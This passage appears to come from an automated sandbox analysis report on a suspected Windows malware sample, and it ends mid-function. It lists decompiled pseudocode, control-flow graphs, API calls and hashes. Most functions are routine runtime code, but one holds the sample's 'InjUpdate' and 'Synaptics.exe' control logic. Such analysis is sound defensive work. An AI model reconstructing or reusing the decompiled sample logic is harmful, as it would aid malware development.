                                                    Function 0043E6BC Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 134registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 300 43e6bc-43e6f3 302 43e6f5-43e6fc 300->302 303 43e768-43e78d GetClassInfoA 300->303 302->303 304 43e6fe-43e703 302->304 305 43e78f-43e79a 303->305 306 43e79c-43e79e 303->306 308 43e705-43e709 304->308 309 43e728-43e763 call 406a70 call 40d180 call 404378 304->309 305->306 307 43e7cd-43e7ea call 43e88c 305->307 310 43e7a0-43e7a8 UnregisterClassA 306->310 311 43e7ad-43e7c6 RegisterClassA 306->311 320 43e7f1-43e804 GetWindowLongA 307->320 321 43e7ec call 40e79c 307->321 308->309 312 43e70b-43e71a call 403d78 308->312 309->303 310->311 311->307 313 43e7c8 call 40e79c 311->313 312->309 323 43e71c-43e726 call 441704 312->323 313->307 325 43e827-43e84e call 40a1d4 call 441a14 call 424e24 call 43c130 320->325 326 43e806-43e816 GetWindowLongA 320->326 321->320 323->303 339 43e853-43e857 325->339 326->325 329 43e818-43e822 SetWindowLongA 326->329 329->325 340 43e864-43e87c call 4049c0 339->340 341 43e859-43e85f call 403de8 339->341 341->340
                                                    C-Code - Quality: 84%
                                                    			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43e87d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00437D70;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E79C(_t94, _t95, _t109, _t111);
						}
					}
					 *0x49bc20 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E79C(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					L00441A14(_t111);
					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						L00403DE8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x43e884);
					return E004049C0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x49dc4c; // 0x422f30
						E00406A70(_t86,  &_v196);
						_t95 = _v196;
						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00404378();
					} else {
						_t108 =  *0x437498; // 0x4374e4
						if(L00403D78(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00441704(_t94);
					}
					goto L7;
				}
			}




















                                                    0x0043e6bc
                                                    0x0043e6bc
                                                    0x0043e6c5
                                                    0x0043e6c9
                                                    0x0043e6cf
                                                    0x0043e6d3
                                                    0x0043e6d4
                                                    0x0043e6d9
                                                    0x0043e6dc
                                                    0x0043e6e7
                                                    0x0043e6e9
                                                    0x0043e6f3
                                                    0x0043e768
                                                    0x0043e76b
                                                    0x0043e780
                                                    0x0043e788
                                                    0x0043e78a
                                                    0x0043e78d
                                                    0x0043e79e
                                                    0x0043e7a8
                                                    0x0043e7a8
                                                    0x0043e7ad
                                                    0x0043e7b7
                                                    0x0043e7c6
                                                    0x0043e7c8
                                                    0x0043e7c8
                                                    0x0043e7c6
                                                    0x0043e7cd
                                                    0x0043e7db
                                                    0x0043e7dd
                                                    0x0043e7ea
                                                    0x0043e7ec
                                                    0x0043e7ec
                                                    0x0043e804
                                                    0x0043e822
                                                    0x0043e822
                                                    0x0043e82a
                                                    0x0043e831
                                                    0x0043e836
                                                    0x0043e84e
                                                    0x0043e853
                                                    0x0043e857
                                                    0x0043e85f
                                                    0x0043e85f
                                                    0x0043e866
                                                    0x0043e869
                                                    0x0043e86c
                                                    0x0043e87c
                                                    0x0043e6fe
                                                    0x0043e6fe
                                                    0x0043e703
                                                    0x0043e728
                                                    0x0043e72b
                                                    0x0043e731
                                                    0x0043e747
                                                    0x0043e74c
                                                    0x0043e751
                                                    0x0043e75e
                                                    0x0043e763
                                                    0x0043e70b
                                                    0x0043e70d
                                                    0x0043e71a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043e723
                                                    0x0043e723
                                                    0x00000000
                                                    0x0043e703

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 0043E780
                                                    • UnregisterClassA.USER32 ref: 0043E7A8
                                                    • RegisterClassA.USER32 ref: 0043E7BE
                                                    • GetWindowLongA.USER32 ref: 0043E7FA
                                                    • GetWindowLongA.USER32 ref: 0043E80F
                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043E822
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                    • String ID: 0/B$@$tC
                                                    • API String ID: 717780171-775952512
                                                    • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                    • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401B60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 361 401b60-401b6b 362 401b71-401b86 361->362 363 401c3d-401c3f 361->363 364 401b92-401bb1 LocalFree 362->364 365 401b88-401b8d RtlEnterCriticalSection 362->365 366 401bc5-401bcb 364->366 365->364 367 401bb3-401bc3 VirtualFree 366->367 368 401bcd-401bf2 call 401460 * 3 366->368 367->366 375 401bf4-401c09 LocalFree 368->375 376 401c0b-401c1f 368->376 375->375 375->376 377 401c21-401c26 RtlLeaveCriticalSection 376->377 378 401c2b-401c35 RtlDeleteCriticalSection 376->378 377->378
                                                    C-Code - Quality: 72%
                                                    			E00401B60() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x49e5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(0x401c36);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L004013F8();
					}
					 *0x49e5c4 = 0;
					_t3 =  *0x49e624; // 0x0
					LocalFree(_t3);
					 *0x49e624 = 0;
					_t19 =  *0x49e5ec; // 0x49e5ec
					while(_t19 != 0x49e5ec) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t19 =  *_t19;
					}
					E00401460(0x49e5ec);
					E00401460(0x49e5fc);
					E00401460(0x49e628);
					_t14 =  *0x49e5e4; // 0x0
					while(_t14 != 0) {
						 *0x49e5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e5e4; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c3d);
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L00401400();
					}
					_push(0x49e5cc);
					L00401408();
					return 0;
				}
			}










                                                    0x00401b61
                                                    0x00401b6b
                                                    0x00401c3f
                                                    0x00401b71
                                                    0x00401b73
                                                    0x00401b74
                                                    0x00401b79
                                                    0x00401b7c
                                                    0x00401b86
                                                    0x00401b88
                                                    0x00401b8d
                                                    0x00401b8d
                                                    0x00401b92
                                                    0x00401b99
                                                    0x00401b9f
                                                    0x00401ba6
                                                    0x00401bab
                                                    0x00401bc5
                                                    0x00401bba
                                                    0x00401bbe
                                                    0x00401bc3
                                                    0x00401bc3
                                                    0x00401bd2
                                                    0x00401bdc
                                                    0x00401be6
                                                    0x00401beb
                                                    0x00401bf2
                                                    0x00401bf6
                                                    0x00401bfd
                                                    0x00401c02
                                                    0x00401c07
                                                    0x00401c0d
                                                    0x00401c10
                                                    0x00401c13
                                                    0x00401c1f
                                                    0x00401c21
                                                    0x00401c26
                                                    0x00401c26
                                                    0x00401c2b
                                                    0x00401c30
                                                    0x00401c35
                                                    0x00401c35

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                    • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID: (I$I
                                                    • API String ID: 3782394904-2351459270
                                                    • Opcode ID: e4fa71282194ec4da96e7a5da48f96cf9d8c0e0a2707d54dfd074da16348a234
                                                    • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                    • Opcode Fuzzy Hash: e4fa71282194ec4da96e7a5da48f96cf9d8c0e0a2707d54dfd074da16348a234
                                                    • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 51%
                                                    			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				char _t33;
				intOrPtr _t38;
				void* _t39;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x49a5f6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x0
				_t97 = _t29; // executed
				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
				 *0x49f149 = _t33;
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x0, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124); // executed
						E00498F04(_t92, _t123, _t124); // executed
						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
						if(_t48 == 0) {
							_t49 =  *0x49f1b0; // 0x0
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x0
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x0
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x0
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x0
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x0
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x0
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98);
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
							L00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124); // executed
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x0
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x0
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					L00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						L00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}
































                                                    0x0049a3e0
                                                    0x0049a3e0
                                                    0x0049a3e0
                                                    0x0049a3e5
                                                    0x0049a3e6
                                                    0x0049a3e7
                                                    0x0049a3e8
                                                    0x0049a3e9
                                                    0x0049a3ea
                                                    0x0049a3eb
                                                    0x0049a3ef
                                                    0x0049a3f0
                                                    0x0049a3f5
                                                    0x0049a3f8
                                                    0x0049a3fd
                                                    0x0049a5ba
                                                    0x0049a5cb
                                                    0x0049a5cf
                                                    0x0049a5d4
                                                    0x0049a5d6
                                                    0x0049a5d9
                                                    0x0049a5dc
                                                    0x0049a5ee
                                                    0x0049a5ee
                                                    0x0049a40a
                                                    0x0049a416
                                                    0x0049a426
                                                    0x0049a426
                                                    0x0049a42c
                                                    0x0049a432
                                                    0x0049a435
                                                    0x0049a43e
                                                    0x0049a446
                                                    0x0049a44d
                                                    0x0049a452
                                                    0x0049a453
                                                    0x0049a458
                                                    0x0049a465
                                                    0x0049a472
                                                    0x0049a477
                                                    0x0049a4fd
                                                    0x0049a4ff
                                                    0x0049a504
                                                    0x0049a50b
                                                    0x0049a5ac
                                                    0x0049a511
                                                    0x0049a513
                                                    0x0049a51a
                                                    0x0049a521
                                                    0x0049a528
                                                    0x0049a538
                                                    0x0049a542
                                                    0x0049a545
                                                    0x0049a54f
                                                    0x0049a552
                                                    0x0049a55c
                                                    0x0049a55f
                                                    0x0049a569
                                                    0x0049a56c
                                                    0x0049a576
                                                    0x0049a579
                                                    0x0049a583
                                                    0x0049a586
                                                    0x0049a58b
                                                    0x0049a594
                                                    0x0049a595
                                                    0x0049a59e
                                                    0x0049a52a
                                                    0x0049a52c
                                                    0x0049a52c
                                                    0x0049a528
                                                    0x00000000
                                                    0x0049a50b
                                                    0x0049a47d
                                                    0x0049a494
                                                    0x0049a496
                                                    0x0049a498
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0049a49a
                                                    0x0049a49a
                                                    0x0049a49b
                                                    0x0049a4a0
                                                    0x0049a4b7
                                                    0x0049a4bc
                                                    0x0049a4c4
                                                    0x0049a4ca
                                                    0x0049a4d5
                                                    0x0049a4dd
                                                    0x0049a4de
                                                    0x0049a4e6
                                                    0x0049a4eb
                                                    0x0049a4ed
                                                    0x0049a4f4
                                                    0x0049a4f4
                                                    0x0049a4f9
                                                    0x0049a4f9
                                                    0x00000000

                                                    APIs
                                                    • OpenMutexA.KERNEL32 ref: 0049A48F
                                                    • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                    • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MutexOpen$CloseHandle
                                                    • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                    • API String ID: 1942958553-1737343353
                                                    • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                    • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004590AC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 94%
                                                    			E004590AC(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = L00403F10(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				L00421B3C(_t91, 0);
				_t42 =  *0x49dabc; // 0x49b520
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x49dabc; // 0x49b520
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x45a814;
				}
				_t43 =  *0x49dc10; // 0x49b528
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x49dc10; // 0x49b528
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0045AA0C;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = L00403BBC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = L00403BBC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E0042B3F8(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49d93c; // 0x49e030
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042B7C8(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
				_t60 =  *0x49d93c; // 0x49e030
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040E020(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					L00409FC4( &_v261, _t27);
				}
				_t69 = E0040E048( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x45150c
				E00404C30(_t31, 0x100,  &_v261);
				_t75 =  *0x49d6e4; // 0x49e038
				if( *_t75 == 0) {
					E004593B4(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0045B188(_t90, 0x100);
				L0045BB4C(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					L00403F68(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                    0x004590ac
                                                    0x004590ac
                                                    0x004590b9
                                                    0x004590bb
                                                    0x004590be
                                                    0x004590be
                                                    0x004590c3
                                                    0x004590c6
                                                    0x004590cc
                                                    0x004590d1
                                                    0x004590db
                                                    0x004590dd
                                                    0x004590e2
                                                    0x004590e5
                                                    0x004590e5
                                                    0x004590eb
                                                    0x004590f5
                                                    0x004590f7
                                                    0x004590fc
                                                    0x004590ff
                                                    0x004590ff
                                                    0x00459105
                                                    0x00459115
                                                    0x00459127
                                                    0x0045912f
                                                    0x00459134
                                                    0x0045913a
                                                    0x00459141
                                                    0x00459148
                                                    0x0045914e
                                                    0x00459154
                                                    0x0045915b
                                                    0x00459162
                                                    0x00459169
                                                    0x0045917c
                                                    0x0045917e
                                                    0x00459189
                                                    0x00459191
                                                    0x0045919a
                                                    0x0045919f
                                                    0x0045919f
                                                    0x004591a5
                                                    0x004591a8
                                                    0x004591bb
                                                    0x004591c3
                                                    0x004591d6
                                                    0x004591e3
                                                    0x004591ea
                                                    0x004591ec
                                                    0x004591f5
                                                    0x004591f5
                                                    0x00459202
                                                    0x00459209
                                                    0x0045920b
                                                    0x0045920b
                                                    0x00459216
                                                    0x0045921b
                                                    0x0045922c
                                                    0x00459231
                                                    0x00459239
                                                    0x0045923d
                                                    0x0045923d
                                                    0x00459242
                                                    0x00459246
                                                    0x0045924a
                                                    0x0045924e
                                                    0x00459257
                                                    0x0045925f
                                                    0x00459266
                                                    0x0045926b
                                                    0x00459271
                                                    0x00459273
                                                    0x00459278
                                                    0x0045927f
                                                    0x00459289

                                                    APIs
                                                    • LoadIconA.USER32 ref: 00459191
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                    • OemToCharA.USER32 ref: 004591D6
                                                    • CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                    • String ID: 0I$8I$MAINICON
                                                    • API String ID: 3935243913-3756263232
                                                    • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                    • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474948 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 53%
                                                    			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed short* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t76;
				void* _t93;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t111;

				_t109 = _t110;
				_t111 = _t110 + 0xffffffc4;
				_v40 = 0;
				_t93 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t109);
				_push(0x474ab3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				E004049C0(__ecx);
				_v32 = 0xff;
				_push( &_v28);
				_t52 = E00404ED8( &_v8);
				_push(_t52); // executed
				L004072A8(); // executed
				_v24 = _t52;
				if(_v24 == 0) {
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(0x474aba);
					E004049C0( &_v40);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = E0040275C(_v24);
					_push(_t109);
					_push(0x474a89);
					_push( *[fs:eax]);
					 *[fs:eax] = _t111;
					_push(_v16);
					_push(_v24);
					_push(_v28);
					_t65 = E00404ED8( &_v8);
					_push(_t65); // executed
					L004072A0(); // executed
					if(_t65 != 0) {
						_push( &_v32);
						_push( &_v36);
						_push("\\VarFileInfo\\Translation");
						_t71 = _v16;
						_push(_t71);
						L004072B0();
						if(_t71 != 0) {
							_v64 =  *_v36 & 0x0000ffff;
							_v60 = 0;
							_v56 = L004079DC( *_v36) & 0x0000ffff;
							_v52 = 0;
							_v48 = _v12;
							_v44 = 0xb;
							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
							E00404A58( &_v12, _v40);
						}
						_push( &_v32);
						_push( &_v20);
						_push(E00404ED8( &_v12));
						_t76 = _v16;
						_push(_t76);
						L004072B0();
						if(_t76 != 0) {
							E0040A174(_v20, _t93);
						}
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x474a90);
					return E0040277C(_v16);
				}
			}




























                                                    0x00474949
                                                    0x0047494b
                                                    0x00474951
                                                    0x00474954
                                                    0x00474956
                                                    0x00474959
                                                    0x0047495f
                                                    0x00474967
                                                    0x0047496e
                                                    0x0047496f
                                                    0x00474974
                                                    0x00474977
                                                    0x0047497c
                                                    0x00474981
                                                    0x0047498b
                                                    0x0047498f
                                                    0x00474994
                                                    0x00474995
                                                    0x0047499a
                                                    0x004749a1
                                                    0x00474a92
                                                    0x00474a95
                                                    0x00474a98
                                                    0x00474aa0
                                                    0x00474ab2
                                                    0x004749a7
                                                    0x004749af
                                                    0x004749b4
                                                    0x004749b5
                                                    0x004749ba
                                                    0x004749bd
                                                    0x004749c3
                                                    0x004749c7
                                                    0x004749cb
                                                    0x004749cf
                                                    0x004749d4
                                                    0x004749d5
                                                    0x004749dc
